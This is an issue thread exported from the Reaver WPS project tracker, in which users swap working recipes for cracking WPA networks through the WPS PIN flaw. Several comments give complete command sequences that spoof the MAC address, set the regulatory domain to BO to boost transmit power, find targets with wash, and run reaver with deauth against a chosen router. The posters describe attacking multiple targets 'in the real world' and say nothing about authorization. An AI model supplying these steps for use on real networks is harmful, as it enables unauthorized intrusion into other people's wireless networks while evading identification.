Problem of Reaver hangup on first key solved

[GoogleCodeExporter]

  I am using Backtrack5R1 that has been upgraded. The reaver program is 1.4. My wireless is an RTL8187.

   To get the program to work I must include a mac address statement at the end of the command string otherwise the program just cycles round and round on the first number or fails to get an association or both.  This is the command sequence I use to get reaver to work. When I do this it cracks wpa like it was popcorn. What seems to be important is that when mac spoofing, the mac of wlan0 and its paired virtual moniter must be the same AND the --mac=00:11:22:33:44:55 command assigning the spoofed mac code also must be in the reaver command string. Okay here is how I do it. Some of the commands are specific only to the RTL8187.

#Clean out any moniters
airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop mon2
#
ifconfig wlan0 down # wlan0 designates your actual wifi reciever
ifconfig wlan0 hw ether 00:11:22:33:44:55
#================ RTL8187 specific power commands
#Following commands set the power for a RTL8187 reciever
iw reg set BO
iwconfig wlan0 txpower 30
iwconfig wlan0 rate 1M
#================ Ends RTL8187 specific power commands
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -a -f -c 11 -b 55:44:33:22:11:00 -vv -x 60 
--mac=00:11:22:33:44:55
# You must change the -c 11 to the channel of your target
# You must change the -b 55:44:33:22:11:00 to your targets mac
# Mac code of wlan0 and mon0 must be equal

Original issue reported on code.google.com by muske...@yahoo.com on 30 Jul 2012 at 3:57

[GoogleCodeExporter]

Addittions
If you spoof the mac this way for reaver any aircrack-ng operation will show 
the original mac for the mon0 virtual moniter. Therefore if you want to spoof 
the mac for aircrack you must use. 

ifconfig down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig up

We are working on the variable mac approach thru aireplay-ng as proposed 
elsewhere in these forums.

Original comment by muske...@yahoo.com on 30 Jul 2012 at 6:11

[GoogleCodeExporter]

Sounds like cool, will try it soon ;))

Original comment by itmanvn on 30 Jul 2012 at 8:46

[GoogleCodeExporter]

How would I fix something like this though? I tried changing the mac exactly as 
posted. usually the router responds with M3 and M4 for about 10-15 mins and 
then it starts showing this for the next couple of hours. I tried deauth 
attacks but evidently that's not the issue for 0x04 errors. I'm stumped :/

[+] Switching wlan0 to channel 1
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received WSC NACK
[+] Sending WSC NACK

Original comment by ronquil...@gmail.com on 1 Aug 2012 at 1:29

[GoogleCodeExporter]

When we first ran the program we got something similiar.� Try reading thru this
�
http://adaywithtape.blogspot.com/2012/01/cracking-wpa-using-wps-vulnerability.ht
ml
�
If you have tried this attack on three(3) or four(4) targets and are getting 
the same result it is probably something in the program itself.
You do not mention how many targets you have tried this attack on and you did 
not mention the operating system. or the wifi reciever.
�
So we will tell you how we do it.
�
You will find that many think the AWUSO36H wifi reciever works the best for 
this attack.
�
We run Backtrack5R1 upgraded. This is for other reasons NOT related to reaver. 
We have just made tests with BT5R1 running from a usb with persistance. The 
program worked fine. The only problem we have had is that an 8 gig USB is too 
small. We used a 16gig flash formated 3gig/Fat32/12gig Ext and it loaded fine. 
We tested it on out router with the -d 0 command set to see if it could handkle 
the speed and we were getting 1 key a second. So from flash drive or hard drive 
the program works just fine.
�
Using BT5R1 we get an internet correction and type
�
apt-get update
�
when it is finished we type
�
apt-get dist-upgrade
�
This second takes a while so have patience.
�
Then type
�
apt-get install reaver
�
�
Now� 
#!/bin/bash
# Remove virtual moniters
airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop mon2
ifconfig wlan1 down
ifconfig wlan1 hw ether 00:11:22:33:44:55
iw reg set BO
iwconfig wlan1 txpower 30
iwconfig wlan1 rate 1M
ifconfig wlan1 up
airmon-ng start wlan1
# Start Wash
wash -i mon0 
�
When you have your target
�
airmon-ng stop mon2
ifconfig wlan1 down
ifconfig wlan1 hw ether 00:11:22:33:44:55
iw reg set BO
iwconfig wlan1 txpower 30
iwconfig wlan1 rate 1M
ifconfig wlan1 up
airmon-ng start wlan1
#
#Either one below work. the --dh-small can speed up the program BUT we suggest 
you use the bottom 
echo reaver -i mon0 -a -f -c 1 -b 55:44:33:22:11:00 -vv -x 60 
--mac=00:11:22:33:44:55 --dh-small
echo reaver -i mon0 -a -f -c 1 -b 55:44:33:22:11:00 -vv -x 60 
--mac=00:11:22:33:44:55
Go to this entry and read the comments in the newest script file with the 
embedded deauth we just wrote. 
http://code.google.com/p/reaver-wps/issues/detail?can=2&start=100&num=100&q=&col
spec=ID%20Type%20Status%20Priority%20Milestone%20Owner%20Summary&groupby=&sort=&
id=258
If you still get the same result against three or four targets write me again. 
We are trying BT5R2 pen drive but it is just being worked on as I�am writing 
this.
�
In closing we love this reaver program.
�
Musket Team Alpha

Original comment by muske...@yahoo.com on 2 Aug 2012 at 5:30

[GoogleCodeExporter]

Yeah I tried those commands but I'm still getting the same thing. Signal 
strength is around -60dB so I don't think that's the problem. Card is a usb 
wireless adapter ath9k. It starts showing 0x04 messages after 10-20 mins of 
successful progress on keys and then I either have to stop reaver and try again 
after 5-6 hours or I put a really long timeout into -x. So far I'm at 16.48% 
over the past week. I'm hoping it'll get there quicker. Already tried reaver 
with the same setup on 2 other routers and the only one with worked flawlessly 
(with -d 0) was a linksys router. I literally had the key in an hour and half. 
This router is a Belkin though. Causing some problems...

Original comment by ronquil...@gmail.com on 3 Aug 2012 at 10:12

[GoogleCodeExporter]

I tried sending a bunch of deauths and that seems to work for a while but it 
doesn't fix the problem for long.

Original comment by ronquil...@gmail.com on 3 Aug 2012 at 10:13

[GoogleCodeExporter]

If you have cracked a code then the problem is not in your program and we can 
work together to see how to solve this. As noted before we are field operatives 
meaning we take these programs and use them in the real world. �As I see it 
this leaves four(4) variables for you to consider:
�
1. Wifi reciever
2. Antenna
2. Target AP
3. Distance�and or placement of�your wifi adapter's antenna.
�
1. Your Wifi Reciever; I cannot comment on your wifi adapter type. All I can 
say is that blogs on reaver note that the best type�to use is the AWUSO36H 
running the rtl8187 driver. If you can try and test one you can then compare it 
with your current reviever. 
.

2,� Antenna; The best reception on a usb reciever is to plug the antenna 
directly into the adapter and place the adapter in a plastic bag outside the 
house. Use usb extensions to do this. If the usb extention has a power plug, 
plug the power plug into a usb splitter.Do not buy a usb extension that has as 
small egg shaped plastic case with a circuit board in it as it will�probably 
not work. You want just a simple 5 meter usb extension. If you link usb 
extensions together use rubber bands not tape to keep the contacts together.
�
���� You can�use sma cable and an antenna if your wifi reciever has an sma plug 
where th antenna attaches BUT your reception will be better if the antenna is 
plugged directly into the reciever. You can go on line there are several simple 
antenna modes to increase signal strength.
�
3.� Routers; Some routers are just sticky and slow. If the router is slow and 
dropping your connection then run the last program we wrote. See I think 258 
the best program is on the bottom and has an embedded deauth and a changing mac 
code routine which runs constantly in the background. Read the comments section 
in the script file. It is easy to use
�
4. As mentioned distance hence Relative Signal Strength shown by the Relative 
Signal Strength Indicator(RSSI) in wash is affected. The three(3) comments 
above are all in an effect to increse signal strength so the program functions 
faster.
�
In the end a reaver� approach is far better then brute force. Hence it takes as 
long as it takes.�
�
�

Original comment by muske...@yahoo.com on 4 Aug 2012 at 10:01

[GoogleCodeExporter]

One thing to consider, based on what I'm seeing in the Reaver messages in this 
thread, is that poor signal strength and/or interference may be causing the 
router to miss seeing the response messages...or that the responses are sent 
before the router is ready to receive them (notice the continued receipt of M1s 
after M2 had already been sent).  

For a long time, I also thought that association/mac addresses were part of the 
problem.  On a hunch, I experimented with adding a tiny delay between response 
messages and most of the difficulties I've had with routers has significantly 
dropped.  If anyone is interested in trying the solution, I've pasted the 
modified source code here:

http://code.google.com/p/reaver-wps/issues/detail?id=167#c28

Original comment by jeff.j.h...@gmail.com on 27 Aug 2012 at 11:04